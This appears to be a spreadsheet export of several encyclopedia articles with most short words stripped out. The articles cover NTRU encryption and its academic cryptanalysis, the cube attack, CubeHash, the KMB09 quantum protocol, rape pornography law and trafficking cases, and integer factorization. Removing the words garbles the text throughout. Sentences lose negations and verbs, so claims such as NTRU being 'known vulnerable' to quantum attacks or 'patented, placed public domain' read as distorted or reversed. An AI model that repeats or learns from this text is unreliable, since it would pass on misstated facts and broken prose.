{\displaystyle {\textbf {r}}=-1+x^{2}+x^{3}+x^{4}-x^{5}-x^{7}} ciphertext represents encrypted message look like {\displaystyle {\textbf {e}}={\textbf {r}}\cdot {\textbf {h}}+{\textbf {m}}{\pmod {32}}=14+11x+26x^{2}+24x^{3}+14x^{4}+16x^{5}+30x^{6}+7x^{7}+25x^{8}+6x^{9}+19x^{10}{\pmod {32}}} decryption anybody knowing could compute message evaluating must revealed alice. addition publicly available information, knows private key. here obtain first multiplies encrypted message part private {\displaystyle {\textbf {a}}={\textbf {f}}\cdot {\textbf {e}}{\pmod {q}}} rewriting polynomials, equation actually representing following computation: {\displaystyle {\textbf {a}}={\textbf {f}}\cdot {\textbf {e}}{\pmod {q}}} {\displaystyle {\textbf {a}}={\textbf {f}}\cdot ({\textbf {r}}\cdot {\textbf {h}}+{\textbf {m}}){\pmod {q}}} {\displaystyle {\textbf {a}}={\textbf {f}}\cdot ({\textbf {r}}\cdot p{\textbf {f}}_{q}\cdot {\textbf {g}}+{\textbf {m}}){\pmod {q}}} {\displaystyle {\textbf {a}}=p{\textbf {r}}\cdot {\textbf {g}}+{\textbf {f}}\cdot {\textbf {m}}{\pmod {q}}} instead choosing coefficients chosen interval [-q/2, q/2] prevent original message properly recovered since alice chooses coordinates message interval [-p/2, p/2]. this implies coefficients {\displaystyle p{\textbf {r}}\cdot {\textbf {g}}+{\textbf {f}}\cdot {\textbf {m}}} already within interval [-q/2, q/2] polynomials prime coefficients small compared this means coefficients left unchanged reducing modulo original message recovered properly. next step calculate modulo {\displaystyle {\textbf {b}}={\textbf {a}}{\pmod {p}}={\textbf {f}}\cdot {\textbf {m}}{\pmod {p}}} {\displaystyle p{\textbf {r}}\cdot {\textbf {g}}{\pmod {p}}=0} knowing part private {\displaystyle \left({\textbf {f}}_{p}\right)} recover alice's message multiplication {\displaystyle {\textbf {f}}_{p}} {\displaystyle {\textbf {c}}={\textbf {f}}_{p}\cdot {\textbf {b}}={\textbf {f}}_{p}\cdot {\textbf {f}}\cdot {\textbf {m}}{\pmod {p}}} {\displaystyle {\textbf {c}}={\textbf {m}}{\pmod {p}}} property {\displaystyle {\textbf {f}}\cdot {\textbf {f}}_{p}=1{\pmod {p}}} required {\displaystyle {\textbf {f}}_{p}} example: encrypted message alice multiplied polynomial {\displaystyle {\textbf {a}}={\textbf {f}}\cdot {\textbf {e}}{\pmod {32}}=3-7x-10x^{2}-11x^{3}+10x^{4}+7x^{5}+6x^{6}+7x^{7}+5x^{8}-3x^{9}-7x^{10}{\pmod {32}},} uses interval [-q/2, q/2] instead interval coefficients polynomial prevent original message recovered correctly. reducing coefficients results {\displaystyle {\textbf {b}}={\textbf {a}}{\pmod {3}}=-x-x^{2}+x^{3}+x^{4}+x^{5}+x^{7}-x^{8}-x^{10}{\pmod {3}}} equals {\displaystyle {\textbf {b}}={\textbf {f}}\cdot {\textbf {m}}{\pmod {3}}} last step result multiplied {\displaystyle {\textbf {f}}_{p}} bob's private original message {\displaystyle {\textbf {c}}={\textbf {f}}_{p}\cdot {\textbf {b}}={\textbf {f}}_{p}\cdot {\textbf {f}}\cdot {\textbf {m}}{\pmod {3}}={\textbf {m}}{\pmod {3}}} {\displaystyle {\textbf {c}}=-1+x^{3}-x^{4}-x^{8}+x^{9}+x^{10}} which indeed original message alice sent bob! attacks since proposal ntru several attacks ntruencrypt public cryptosystem introduced. most attacks focused making total break finding secret instead recovering message known non-zero coefficients successfully mount brute force attack trying values when wants know whether secret key, simply calculates {\displaystyle {\textbf {f}}'\cdot {\textbf {h}}{\pmod {q}}} small coefficients might secret test secret using decrypt message encrypted herself. could also values test {\displaystyle {\textbf {g}}'\cdot {\textbf {h}}^{-1}{\pmod {q}}} small values. possible mount meet-in-the-middle attack powerful. search time square root. attack based property {\displaystyle {\textbf {f}}\cdot {\textbf {h}}=p{\textbf {g}}{\pmod {q}}} wants find {\displaystyle {\textbf {f}}_{1}} {\displaystyle {\textbf {f}}_{2}} {\displaystyle {\textbf {f}}={\textbf {f}}_{1}+{\textbf {f}}_{2}} holds property {\displaystyle \left({\textbf {f}}_{1}+{\textbf {f}}_{2}\right)\cdot {\textbf {h}}={\textbf {g}}{\pmod {q}}} {\displaystyle {\textbf {f}}_{1}\cdot {\textbf {h}}={\textbf {g}}-{\textbf {f}}_{2}\cdot {\textbf {h}}{\pmod {q}}} one's zero's, creates possible {\displaystyle {\textbf {f}}_{1}} {\displaystyle {\textbf {f}}_{2}} length {\displaystyle {\frac {1}{2}}n} (e.g. {\displaystyle {\textbf {f}}_{1}} covers {\displaystyle {\frac {1}{2}}n} lowest coefficients {\displaystyle {\textbf {f}}_{2}} highest) one's. then computes {\displaystyle {\textbf {f}}_{1}\cdot {\textbf {h}}{\pmod {q}}} {\displaystyle {\textbf {f}}_{1}} orders bins based first coordinates. after computes {\displaystyle -{\textbf {f}}_{2}\cdot {\textbf {h}}{\pmod {q}}} orders bins based first coordinates, also based happens first coordinates. then check bins contain {\displaystyle {\textbf {f}}_{1}} {\displaystyle {\textbf {f}}_{2}} property {\displaystyle {\textbf {f}}_{1}\cdot {\textbf {h}}={\textbf {g}}-{\textbf {f}}_{2}\cdot {\textbf {h}}{\pmod {q}}} holds. lattice reduction attack best known practical methods break ntruencrypt. compared factorization modulus rsa. used algorithm lattice reduction attack lenstra-lenstra-lovász algorithm. because public contains obtain however hard find secret ntruencrypt parameters chosen secure enough. lattice reduction attack becomes harder dimension lattice gets bigger shortest vector gets longer. chosen ciphertext attack also method recovers secret thereby results total break. attack tries obtain message ciphertext thereby tries obtain secret key. attack interaction bob. works: first creates cipher text {\displaystyle {\textbf {e}}=c{\textbf {h}}+c} {\displaystyle c=0{\pmod {p}},c&lt;{\frac {q}{2}}} {\displaystyle 2c&gt;{\frac {q}{2}}} when writes steps decipher (without actually calculating values since know finds {\displaystyle {\textbf {a}}={\textbf {f}}\cdot {\textbf {e}}{\pmod {q}}} {\displaystyle {\textbf {a}}={\textbf {f}}\left(c{\textbf {h}}+c\right){\pmod {q}}} {\displaystyle {\textbf {a}}=c{\textbf {g}}+c{\textbf {f}}{\pmod {q}}} {\displaystyle {\textbf {a}}=c{\textbf {g}}+c{\textbf {f}}-qk} {\displaystyle k=\sum k_{i}x^{i}} coefficient coefficient otherwise {\displaystyle k_{i}={\begin{cases}1\ \qquad {\text{if the}}\ i^{th}\ {\text{coefficient of}}\ {\textbf {f}}\ {\text{and}}\ {\textbf {g}}\ {\text{is}}\ 1\\-1\qquad {\text{if the}}\ i^{th}\ {\text{coefficient of}}\ {\textbf {f}}\ {\text{and}}\ {\textbf {g}}\ {\text{is}}\ -1\\0\ \qquad {\text{otherwise}}\end{cases}}} example: {\displaystyle {\textbf {f}}=-1+x+x^{2}-x^{4}+x^{6}+x^{9}-x^{10}} {\displaystyle {\textbf {g}}=-1+x^{2}+x^{3}+x^{5}-x^{8}-x^{10}} then becomes {\displaystyle k=-1+x^{2}-x^{10}} reducing coefficients polynomials really reduces coefficients {\displaystyle c{\textbf {g}}+c{\textbf {f}}-qk{\pmod {p}}} after multiplication {\displaystyle {\textbf {f}}_{p}} finds: {\displaystyle {\textbf {m}}=c{\textbf {f}}_{p}\cdot {\textbf {g}}+c{\textbf {f}}_{p}\cdot {\textbf {f}}-q{\textbf {f}}_{p}\cdot k{\pmod {p}}} {\displaystyle {\textbf {m}}=c{\textbf {h}}+c-q{\textbf {f}}_{p}\cdot k{\pmod {p}}} because chosen multiple written {\displaystyle {\textbf {m}}=-q{\textbf {f}}_{p}\cdot k{\pmod {p}}} which means {\displaystyle {\textbf {f}}=-qk\cdot {\textbf {m}}^{-1}{\pmod {p}}} coefficients factors, zero coefficients thereby small. trying different values attacker recover encrypting decrypting message according ntruencrypt attacker check whether function correct secret not. security performance improvements using latest suggested parameters (see below) ntruencrypt public cryptosystem secure attacks. there continues however struggle performance security. hard improve security without slowing speed, vice versa. speed process without damaging effectiveness algorithm, make changes secret first, construct {\displaystyle {\textbf {f}}=1+p{\textbf {f}}} small polynomial (i.e. coefficients {-1,0, 1}). constructing way, invertible fact {\displaystyle {\textbf {f}}^{-1}=1{\pmod {p}}} means actually calculate inverse conduct second step decryption. therefore, constructing saves time affect security ntruencrypt easier find {\displaystyle {\textbf {f}}_{p}} still hard recover. case coefficients different multiplication multiplies generate public later reduces ciphertext modulo effect encryption method. second, written product multiple polynomials, polynomials many zero coefficients. this fewer calculations conducted. according 2020 ntru nist submission following parameters considered secure: table parameters references jaulmes, joux, chosen-ciphertext attack ntru. lecture notes computer science; 1880. proceedings 20th annual international cryptology conference advances cryptography. 20–35, 2000. jeffrey hoffstein, jill pipher, joseph silverman. ntru: ring based public cryptosystem. algorithmic number theory (ants iii), portland, june 1998, j.p. buhler (ed.), lecture notes computer science 1423, springer-verlag, berlin, 1998, 267–288. howgrave-graham, silverman, j.h. whyte, meet-in-the-middle attack ntru private key. hoffstein, silverman. optimizations ntru. public-key cryptography computational number theory (warsaw, september 11–15, 2000), degruyter, appear. atici, batina, verbauwhede. low-cost implementations ntru pervasive security. external links ntru technical website ieee p1363 home page security innovation (acquired ntru cryptosystems, inc.) open source license implementation ntruencrypt open source license ntruencrypt strongswan open source ipsec solution using ntruencrypt-based exchange embedded ssl/tls library offering cipher suites utilizing ntru (wolfssl)</t>
  </si>
  <si>
    <t>NTRU</t>
  </si>
  <si>
    <t>ntru open-source public-key cryptosystem uses lattice-based cryptography encrypt decrypt data. consists algorithms: ntruencrypt, used encryption, ntrusign, used digital signatures. unlike popular public-key cryptosystems, resistant attacks using shor's algorithm. ntruencrypt patented, placed public domain 2017. ntrusign patented, used software gpl. history first version system, called ntru, developed 1996 mathematicians jeffrey hoffstein, jill pipher, joseph silverman. that year, developers ntru joined daniel lieman founded company ntru cryptosystems, inc., given patent cryptosystem. name "ntru", chosen company soon applied system well, originally derived number theorists alternatively, stood number theory research unit. 2009, company acquired security innovation, software security corporation. 2013, damien stehle steinfeld created provably secure version ntru, studied post-quantum crypto group chartered european commission.in 2016, daniel bernstein, chitchanok chuengsatiansup, tanja lange christine vredendaal released ntru prime, adds defenses potential attack ntru eliminating algebraic structure considered worrisome. however, years scrutiny, concrete approach attack original ntru exploiting algebraic structure found far. ntru became finalist round post-quantum cryptography standardization project, whereas ntru prime became alternate candidate. performance equivalent cryptographic strength, ntru performs costly private-key operations much faster does. time performing private operation increases cube size, whereas ntru operation increases quadratically. 2010, department electrical engineering, university leuven, noted "[using] modern gtx280 gpu, throughput 200000 encryptions second reached security level bits. comparing symmetric cipher (not common comparison), around times slower recent implementation." resistance quantum-computer-based attacks unlike elliptic-curve cryptography, ntru known vulnerable attacks quantum computers. national institute standards technology wrote 2009 survey "[there] viable alternatives public encryption signatures vulnerable shor’s algorithm” “[of] various lattice based cryptographic schemes developed, ntru family cryptographic algorithms appears practical". european union's pqcrypto project (horizon 2020 ict-645622) evaluating provably secure stehle–steinfeld version ntru (not original ntru algorithm itself) potential european standard. however stehle–steinfeld version ntru "significantly less efficient original scheme". standardization standard ieee 1363.1, issued 2008, standardizes lattice-based public-key cryptography, especially ntruencrypt. standard x9.98 standardizes lattice-based public-key cryptography, especially ntruencrypt, part standards financial services industry. pqcrypto project european commission considering standardization provably secure stehle–steinfeld version ntru. implementations originally, ntru available proprietary, for-pay library, open-source authors threatened legal action. 2011 first open-source implementation appeared, 2013, security innovation exempted open-source projects patent license released ntru reference implementation v2.implementations: openssh default uses ntru combined x25519 ecdh exchange since version 9.0. gpl-licensed reference implementation bsd-licensed library bouncycastle goldbug messenger first chat e-mail client ntru algorithm open-source license, based spot-on encryption suite kernels. additionally, wolfssl provides support ntru cipher suites lightweight implementation. references external links ntru nist submission ntru prime nist submission</t>
  </si>
  <si>
    <t>Cube attack</t>
  </si>
  <si>
    <t>cube attack method cryptanalysis applicable wide variety symmetric-key algorithms, published itai dinur shamir september 2008 preprint. attack revised version preprint placed online january 2009, paper also accepted presentation eurocrypt 2009. cipher vulnerable output represented sufficiently degree polynomial gf(2) input bits; particular, describes many stream ciphers based lfsrs. believed immune attack. works summing output value possible values subset public input bits, chosen resulting linear combination secret bits; repeated application technique gives linear relations secret bits solved discover bits. authors show cipher resembles random polynomial sufficiently degree sets public input bits exist high probability, discovered precomputation phase "black probing" relationship input output various choices public secret input bits making information construction cipher. paper presents practical attack, authors implemented tested, stream cipher previous known attack would effective. state 10,000 lfsr secret dense feedback polynomial, filtered array 1000 secret 8-bit 1-bit s-boxes, whose input based secret taps lfsr state whose output xored together. each lfsr initialized different secret dense quadratic polynomial bits. lfsr clocked large secret number times without producing outputs, first output given made available attacker. after short preprocessing phase attacker query output bits variety combinations, operations required discover cipher. authors also claim attack version trivium reduced initialization rounds complexity 230, conjecture techniques extend breaking 1100 trivium's 1152 initialization rounds "maybe even original cipher". december 2008 best attack known trivium. attack however, embroiled separate controversies. firstly, daniel bernstein disputes assertion previous attack 10,000-bit lfsr-based stream cipher existed, claims attack reduced-round trivium "doesn't give real reason think (the full) trivium attacked". claims cube paper failed cite existing paper xuejia detailing attack ciphers small-degree polynomials, believes cube attack merely reinvention existing technique. secondly, dinur shamir credit michael vielhaber's "algebraic differential attack" (aida) precursor cube attack. dinur stated eurocrypt 2009 cube generalises improves upon aida. however, vielhaber contends cube attack attack another name. however, acknowledged parties involved cube's efficient linearity test test results attack needing less time aida, although substantial particular change remains dispute. cube aida differ. vielhaber claims, instance, linear polynomials bits obtained attack unusually sparse. supplied evidence this, claims evidence appear forthcoming paper entitled "the algebraic differential attack: aida attacking full trivium". clear whether alleged sparsity applies ciphers trivium.) references</t>
  </si>
  <si>
    <t>CubeHash</t>
  </si>
  <si>
    <t>cubehash cryptographic hash function submitted nist hash function competition daniel bernstein. cubehash byte state, uses wide pipe construction, based. message blocks xored initial bits 128-byte state, goes r-round bijective transformation blocks. initial nist proposal ("cubehash8/1") required cycles byte. after clarifications nist, author changed proposal cubehash16/32, approximately times faster cubehash8/1, easily catching sha-256 sha-512 reference platform" still maintaining "comfortable security margin".cubehash advanced second round competition, chosen finalists. bernstein since tuned parameters main recommendation cubehash512, defined cubehash16+16/32+32–512. operation this description refers latest specification, nist submission.cubehash parameters, certain instance denoted cubehashi+r/b+f-h. number initial rounds number rounds block block size bytes, defined 128} number final rounds size hash output bits, defined 512}in original nist submission, fixed 10r. obsolete notation cubehashr/b-h indicates implicitly 10r. internal state defined five-dimensional array words (four-byte integers), dimensions. words referred coordinates [00000] [11111]. words treated little-endian. internal state initialized setting first three words ([00000], [00001], [00010]) h/8, respectively, words zero. state rounds, initialization stage complete. state initialization vector (iv). saved reused given combination message padded split b-byte blocks. padding appends bit, followed many bits necessary make complete block. each block inputted xoring first bytes state, performing rounds transformation. finally, xored state word [11111], rounds transformation performed. output hash contained first bytes final state. round function cubehash round function consists following steps: x[0jklm] x[1jklm] modulo 232, (j,k,l,m). rotate x[0jklm] upwards bits, (j,k,l,m). swap x[00klm] x[01klm], (k,l,m). x[1jklm] x[0jklm], (j,k,l,m). swap x[1jk0m] x[1jk1m], (j,k,m). x[0jklm] x[1jklm] modulo 232, (j,k,l,m). rotate x[0jklm] upwards bits, (j,k,l,m). swap x[0j0lm] x[0j1lm], (j,l,m). x[1jklm] x[0jklm], (j,k,l,m). swap x[1jkl0] x[1jkl1], (j,k,l). example hashes this example uses cubehash80+8/1+80-512. initialization vector 80+8/1+f-512 hashes, follows: 6998f35dfb0930c760948910e626160f36077cf3b58b0d0c57cf193d3341e7b8\ a334805b2089f9ef31ffc4142aef3850fe121839e940a4527d5293a27045ca12\ 9358096e81bf70349a90a44a93c33edb14c3e9844a87dbd0bc451df25212b3ac\ 6aabe51c5df0f63bddbb8ae8fad3cf0fd52582fbad2e2446094025a521a23d5c hashing ascii message "hello" (hex: 0x48, 0x65, 0x6c, 0x6c, 0x6f) uses message blocks. there blocks message, since byte-aligned input, block padding. hash value 7ce309a25e2e1603ca0fc369267b4d43f0b1b744ac45d6213ca08e7567566444\ 8e2f62fdbf7bbd637ce40fc293286d75b9d09e8dda31bd029113e02ecccfd39b small change message, flipping single bit, wildly change hash output, avalanche effect. hashing message "hello" (which differs "hello" position) gives following hash value: 01ee7f4eb0e0ebfdb8bf77460f64993faf13afce01b55b0d3d2a63690d25010f\ 7127109455a7c143ef12254183e762b15575e0fcc49c79a0471a970ba8a66638 parameter changes cubehash allows many different parameters used determine hash output. user decide parameters wish use. here several example hashes different messages, using different parameters. messages ascii. message: (the zero-length string) cubehash160+16/32+160-512: 4a1d00bbcfcb5a9562fb981e7f7db3350fe2658639d948b9d57452c22328bb32\ f468b072208450bad5ee178271408be0b16e5633ac8a1e3cf9864cfbfc8e043a cubehash80+8/1+80-512: 90bc3f2948f7374065a811f1e47a208a53b1a2f3be1c0072759ed49c9c6c7f28\ f26eb30d5b0658c563077d599da23f97df0c2c0ac6cce734ffe87b2e76ff7294 cubehash10+1/1+10-512: 3f917707df9acd9b94244681b3812880e267d204f1fdf795d398799b584fa8f1\ f4a0b2dbd52fd1c4b6c5e020dc7a96192397dd1bce9b6d16484049f85bb71f2f cubehash160+16/32+160-256: 44c6de3ac6c73c391bf0906cb7482600ec06b216c7c54a2a8688a6a42676577d cubehash80+8/1+80-256: 38d1e8a22d7baac6fd5262d83de89cacf784a02caa866335299987722aeabc59 cubehash10+1/1+10-256: 80f72e07d04ddadb44a78823e0af2ea9f72ef3bf366fd773aa1fa33fc030e5cb message: "hello" cubehash160+16/32+160-512: dcc0503aae279a3c8c95fa1181d37c418783204e2e3048a081392fd61bace883\ a1f7c4c96b16b4060c42104f1ce45a622f1a9abaeb994beb107fed53a78f588c cubehash80+8/1+80-512: 7ce309a25e2e1603ca0fc369267b4d43f0b1b744ac45d6213ca08e7567566444\ 8e2f62fdbf7bbd637ce40fc293286d75b9d09e8dda31bd029113e02ecccfd39b cubehash10+1/1+10-512: 13cf99c1a71e40b135f5535bee02e151eb4897e4de410b9cb6d7179c677074eb\ 6ef1ae9a9e685ef2d2807509541f484d39559525179d53838eda95eb3f6a401d cubehash160+16/32+160-256: e712139e3b892f2f5fe52d0f30d78a0cb16b51b217da0e4acb103dd0856f2db0 cubehash80+8/1+80-256: 692638db57760867326f851bd2376533f37b640bd47a0ddc607a9456b692f70f cubehash10+1/1+10-256: f63041a946aa98bd47f3175e6009dcb2ccf597b2718617ba46d56f27ffe35d49 message: "the quick brown jumps lazy dog" cubehash160+16/32+160-512: bdba44a28cd16b774bdf3c9511def1a2baf39d4ef98b92c27cf5e37beb8990b7\ cdb6575dae1a548330780810618b8a5c351c1368904db7ebdf8857d596083a86 cubehash80+8/1+80-512: ca942b088ed9103726af1fa87b4deb59e50cf3b5c6dcfbcebf5bba22fb39a6be\ 9936c87bfdd7c52fc5e71700993958fa4e7b5e6e2a3672122475c40f9ec816ba cubehash10+1/1+10-512: eb7f5f80706e8668c61186c3c710ce57f9094fbfa1dbdc7554842cdbb4d10ce4\ 2fce72736d10b152f6216f23fc648bce810a7af4d58e571ec1b852fa514a0a8e cubehash160+16/32+160-256: 5151e251e348cbbfee46538651c06b138b10eeb71cf6ea6054d7ca5fec82eb79 cubehash80+8/1+80-256: 94e0c958d85cdfaf554919980f0f50b945b88ad08413e0762d6ff0219aff3e55 cubehash10+1/1+10-256: 217a4876f2b24cec489c9171f85d53395cc979156ea0254938c4c2c59dfdf8a4 initialization vectors four variants shown different well. example, initialization vector cubehash80+8/1+80-512 seen above, cubehash80+8/1+80-256 830b2bd5273d616fd785876a4a500218a5388963eeb702fb47547842459f8d89\ 8727a1c8ba40bd48cef47fe82543c2735c033052ae9fcd632d4541bde6b6cb0d\ cb8a9cdf579f5b67b2ae00968180af6e51ebdf0ca597cd2bf91f981f7ab29a62\ 01ad72d946e6c075c6d1337e0a293d6f90c438ac38be153f32aa288ffc5eca8a security strength function increases decreases towards increases. cubehash 8/1-512 stronger (more secure) cubehash 1/1-512, cubehash 1/1-512 stronger cubehash 1/2-512. weakest possible version algorithm cubehash 1/128-h. however, security versus time tradeoff. secure version take longer compute hash value weakened version. references external links cubehash site</t>
  </si>
  <si>
    <t>KMB09 protocol</t>
  </si>
  <si>
    <t>kmb09 protocol (named muhammad mubashir khan, michael murphy almut beige) alternative quantum distribution protocol, alice mutually unbiased bases encoding encoding ‘1’. security scheme minimum index transmission error rate (iter) quantum error rate (qber) introduced eavesdropper. iter increases significantly higher-dimensional photon states. this allows noise transmission line, thereby increasing possible distance alice without need intermediate nodes. references</t>
  </si>
  <si>
    <t>Rape pornography</t>
  </si>
  <si>
    <t>rape pornography subgenre pornography involving description depiction rape. such pornography either involves simulated rape, wherein sexually consenting adults feign rape, involves actual rape. victims actual rape coerced feign consent pornography produced deceptively appears simulated rape non-rape pornography. depiction rape non-pornographic media considered rape pornography. simulated scenes rape forms sexual violence appeared mainstream cinema, including rape revenge films, almost since advent.the legality simulated rape pornography varies across legal jurisdictions. controversial argument encourages people commit rape. however, studies effects pornography depicting sexual violence produce conflicting results. creation real rape pornography crime countries rape illegal. real rape pornography, including statutory rape child pornography, created profit reasons. rape pornography, well revenge porn similar subgenres depicting violence, associated rape culture. legality united kingdom possession rape pornography illegal scotland, england wales. scotland, criminal justice licensing (scotland) 2010 criminalised possession "extreme" pornography. this included depictions rape, "other non-consensual penetrative sexual activity, whether violent otherwise", including involving consenting adults images faked. maximum penalty unlimited fine years imprisonment. often used, resulted prosecution first four years force.in england wales, took another five years pornography depicts rape (including simulations involving consenting adults) made illegal england wales, bringing line scotland. section criminal justice immigration 2008 already criminalised possession "extreme pornography" explicitly specify depictions rape. time thought sale rape pornography might already illegal england wales result obscene publications 1959, ruling peacock january 2012 demonstrated case. introduction first announced 2013 prime minister david cameron. speech nspcc stated pornography depicts simulated rape "normalise(s) sexual violence women", although ministry justice criminal policy unit previously stated evidence show creation staged rape images involves harm participants causes harm society large".in february 2015, section criminal justice courts 2015 amended criminal justice immigration 2008 criminalise possession pornographic imagery depicting acts rape. applies consensual, simulated, fantasy material. possession image capturing actual rape, example cctv footage, illegal; "make believe" image created consenting adults open prosecution. january 2014 sexual freedom campaign groups criticised section poorly defined liable criminalise wider range material originally suggested. however, april 2014 bbfc's presentation parliament suggested proposed legislation would cover "clearly fictional depictions rape sexual violence participants clearly actors, acting script". germany germany, distribution pornography featuring real faked rape illegal. united states there practical legal restrictions rape pornography united states. enforcement agencies concentrate examples believe crime committed production. "fantasy" rape pornography depicting rape simulations involving consenting adults priority police.in response verdict people turner sexual assault case, xhamster instituted "brock turner rule", banned videos involving rape, including involving unconscious partner hypnosis. real rape cases non-internet american porn actress linda lovelace wrote autobiography, ordeal, coerced raped pornographic films 1970s. internet internet policing respect investigating actual crime made increasingly difficult rape pornography websites operating anonymously, ignoring icann regulations providing false information whois database.from 2009 2020, pornographic company girlsdoporn created hundreds pornographic videos women depicted manipulated, coerced, lied given marijuana drugs physically forced sex, according accounts victims material lawsuit company. people involved website charged trafficking force, fraud coercion november 2019. official videos company viewed billion times, including paid subscription service website, estimated million views tube site pornhub, official channel among site's viewed. pirated copies videos also viewed hundreds millions times. according lawsuit, videos could still found mainstream pornography websites least december 2020.japanese women forced pornographic videos 2010s.real rape videos women girls filmed doctor's room room cases south korea late 2010s early 2020s.videos showing real rape hosted popular pornographic video sharing pornography websites. these websites criticized petitioners. cybersex trafficking victims cybersex trafficking forced live streaming rape pornography, recorded later sold. they raped traffickers front webcam forced perform acts victims. traffickers film broadcast crimes real time. victims frequently forced watch paying consumers shared screens follow orders. occurs locations, commonly referred ‘cybersex dens,’ homes, hotels, offices, internet cafes, businesses. references further reading bridges, (october 2019). "chapter pornography sexual assault". o'donohue, yvonne; william paul (eds.). handbook sexual assault sexual assault prevention. routledge. 129–149. isbn 978-3030236441. diamond, milton (october 2009). "pornography, public acceptance related crime: review". international journal psychiatry. (5): 304–314. doi:10.1016/j.ijlp.2009.06.004. pmid 19665229. abstract. diamond, milton uchiyama, ayako (1999). "pornography, rape crimes japan". international journal psychiatry. (1): 1–22. doi:10.1016/s0160-2527(98)00035-1. pmid 10086287. abstract. makin, david morczek, amber (june 2015). "the dark side internet searches: macro level assessment rape culture". international journal cyber criminology. (1): 1–23. abstract. makin, david morczek, amber (february 2015). views counting: interest rape-oriented pornography gendered microaggressionjournal interpersonal violence". (3): 244–257. {{cite journal}}: cite journal requires |journal= (help) abstract. malamuth, neal (2014). pornography sexual aggression. elsevier science. isbn 9781483295794. mowlabocus, sharif wood, rachel (september 2015). "introduction: audiences consumers porn". porn studies. (3): 118–122. doi:10.1080/23268743.2015.1056465. abstract. palermo, alisia dadgardoust, laleh (may 2019). "examining role pornography rape supportive cognitions lone multiple perpetrator rape proclivity". journal sexual aggression. (12): 2131–2155. abstract. purcell, natalie (2012). pornography violence. routledge. isbn 9781136274473.</t>
  </si>
  <si>
    <t>Integer factorization</t>
  </si>
  <si>
    <t>number theory, integer factorization decomposition composite number product smaller integers. factors restricted prime numbers, process called prime factorization. when numbers sufficiently large, efficient non-quantum integer factorization algorithm known. however, proven algorithm exist. presumed difficulty problem important algorithms used cryptography public-key encryption digital signature. many areas mathematics computer science brought bear problem, including elliptic curves, algebraic number theory, quantum computing. 2019, fabrice boudot, pierrick gaudry, aurore guillevic, nadia heninger, emmanuel thomé paul zimmermann factored 240-digit (795-bit) number (rsa-240) utilizing approximately core-years computing power. researchers estimated 1024-bit modulus would take times long.not numbers given length equally hard factor. hardest instances problems (for currently known techniques) semiprimes, product prime numbers. when large, instance thousand bits long, randomly chosen, size (but close, example, avoid efficient factorization fermat's factorization method), even fastest prime factorization algorithms fastest computers take enough time make search impractical; number digits primes factored increases, number operations required perform factorization computer increases drastically. many cryptographic protocols based difficulty factoring large composite integers related problem—for example, problem. algorithm efficiently factors arbitrary integer would render rsa-based public-key cryptography insecure. prime decomposition fundamental theorem arithmetic, every positive integer unique prime factorization. convention, empty product.) testing whether integer prime done polynomial time, example, primality test. composite, however, polynomial time tests give insight obtain factors. given general algorithm integer factorization, integer factored constituent prime factors repeated application algorithm. situation complicated special-purpose factorization algorithms, whose benefits realized well even factors produced decomposition. example, large primes, trial division quickly produce factors take divisions find next factor. contrasting example, product primes 13729, 1372933, 18848997161, 13729 1372933 18848997157, fermat's factorization method begin 18848997159 {\displaystyle \lceil {\sqrt {n}}\rceil =18848997159} immediately yields {\textstyle b={\sqrt {a^{2}-n}}={\sqrt {4}}=2b} hence factors 18848997157 18848997161. while easily recognized composite prime respectively, fermat's method take much longer factor composite number starting value 18848997157 137292 {\textstyle \lceil {\sqrt {18848997157}}\rceil =137292} nowhere near 1372933. current state among b-bit numbers, difficult factor practice using existing algorithms products primes similar size. reason, integers used cryptographic applications. largest semiprime factored rsa-250, 829-bit number decimal digits, february 2020. total computation time roughly 2700 core-years computing using intel xeon gold 6130 ghz. like recent factorization records, factorization completed highly optimized implementation general number field sieve hundreds machines. difficulty complexity algorithm published factor integers polynomial time, factor b-bit number time o(bk) constant neither existence non-existence algorithms proved, generally suspected exist hence problem class problem clearly class generally suspected np-complete, though proven.there published algorithms faster o((1 ε)b) positive sub-exponential. 2021-03-12, algorithm best theoretical asymptotic running time general number field sieve (gnfs), first published 1993, running b-bit number time: {\displaystyle \exp \left(\left({\sqrt[{3}]{\frac {64}{9}}}+o(1)\right)(\ln n)^{\frac {1}{3}}(\ln n)^{\frac {2}{3}}\right).} current computers, gnfs best published algorithm large (more bits). quantum computer, however, peter shor discovered algorithm 1994 solves polynomial time. this significant implications cryptography quantum computation becomes scalable. shor's algorithm takes o(b3) time o(b) space b-bit number inputs. 2001, shor's algorithm implemented first time, using techniques molecules provide qubits.it known exactly complexity classes contain decision version integer factorization problem (that factor smaller k?). known co-np, meaning "yes" "no" answers verified polynomial time. answer "yes" certified exhibiting factorization d(n/d) answer "no" certified exhibiting factorization distinct primes, larger verify primality using primality test, multiply obtain fundamental theorem arithmetic guarantees possible string increasing primes accepted, shows problem co-up. known shor's algorithm. problem suspected outside three complexity classes np-complete, co-np-complete. therefore candidate np-intermediate complexity class. could proved either np-complete co-np-complete, would imply co-np, surprising result, therefore integer factorization widely suspected outside classes. contrast, decision problem composite number?" equivalently: prime number?") appears much easier problem specifying factors composite/prime problem solved polynomial time number digits primality test. addition, several probabilistic algorithms test primality quickly practice willing accept vanishingly small possibility error. ease primality testing crucial part algorithm, necessary find large prime numbers start with. factoring algorithms special-purpose special-purpose factoring algorithm's running time depends properties number factored unknown factors: size, special form, etc. parameters determine running time vary among algorithms. important subclass special-purpose factoring algorithms category first category algorithms, whose running time depends size smallest prime factor. given integer unknown form, methods usually applied general-purpose methods remove small factors. example, naive trial division category algorithm. trial division wheel factorization pollard's algorithm, common flavors identify group cycles: floyd brent. algebraic-group factorization algorithms, among pollard's algorithm, williams' algorithm, lenstra elliptic curve factorization fermat's factorization method euler's factorization method special number field sieve general-purpose general-purpose factoring algorithm, also known category second category, kraitchik family algorithm, running time depends solely size integer factored. this type algorithm used factor numbers. most general-purpose factoring algorithms based congruence squares method. dixon's algorithm continued fraction factorization (cfrac) quadratic sieve rational sieve general number field sieve shanks's square forms factorization (squfof) other notable algorithms shor's algorithm, quantum computers heuristic running time number theory, many integer factoring algorithms heuristically expected running time {\displaystyle l_{n}\left[{\tfrac {1}{2}},1+o(1)\right]=e^{(1+o(1)){\sqrt {(\log n)(\log \log n)}}}} little-o l-notation. some examples algorithms elliptic curve method quadratic sieve. another algorithm class group relations method proposed schnorr, seysen, lenstra, proved assuming unproved generalized riemann hypothesis (grh). rigorous running time schnorr–seysen–lenstra probabilistic algorithm rigorously proven lenstra pomerance expected running time {\displaystyle l_{n}\left[{\tfrac {1}{2}},1+o(1)\right]} replacing assumption multipliers. algorithm uses class group positive binary quadratic forms discriminant denoted triples integers integers relative prime. schnorr–seysen–lenstra algorithm given 